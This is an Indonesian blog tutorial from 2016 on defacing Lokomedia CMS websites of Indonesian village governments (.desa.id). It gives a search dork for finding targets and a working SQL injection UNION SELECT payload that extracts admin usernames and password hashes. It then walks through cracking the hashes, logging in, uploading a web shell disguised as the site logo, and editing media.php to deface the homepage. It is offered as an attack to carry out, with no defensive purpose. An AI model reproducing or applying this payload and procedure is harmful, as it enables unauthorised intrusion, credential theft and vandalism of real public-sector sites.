Minggu, 31 Juli 2016

Tutorial Deface Menggunakan Sql Lokomedia ( site:.desa.id )



inurl:/semua-album site:.desa.id ( bisa dikembangkan )
ini target ane bro , masi segar ya
klik berita desa
dan pilih berita yang teratas 


liat htmlnya , tambahin exploitnya disamping kiri .
-' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(username,0x3a,password),30,31,32 from+users+--+
jika udah enter aja gan , ga usah ragu , pasti akan keluar togelnya :v kek dibawah ini. ini assword harus di hash dulu ya
tekan CTRL + U
setelah itu CTRL + F ketik admin , copy passwordnya yang harus di hash tadi
passwordya tadi masukkin ke hashkiller biar kita crack password aslinya  seperti dibawah ini, kalau ga keluar atau not found cari target lain aja
tempat login admin pagenya . site.com/redaktur
klik modul web > edit  dan ganti logo tadi menjadi shell/backdoor agan (tidak ditemper data juga bisa)
untuk mencari letak shell/backdoornya yang di upload tadi
site.com/logo/namashell.php
bagi kalian yang manial index :v klik public_html 
cari media.php dan edit script web menjadi script deface anda setelah itu klik save
dan ini hasilnya 
selesai  sampai sini aja 

terima kasih atas kunjungannyaaaaa ... ^_^ 

sumber = Orang Ganteng
Facebook Sumber = Orang Ganteng
Load disqus comments

0 komentar

Comments
0 Comments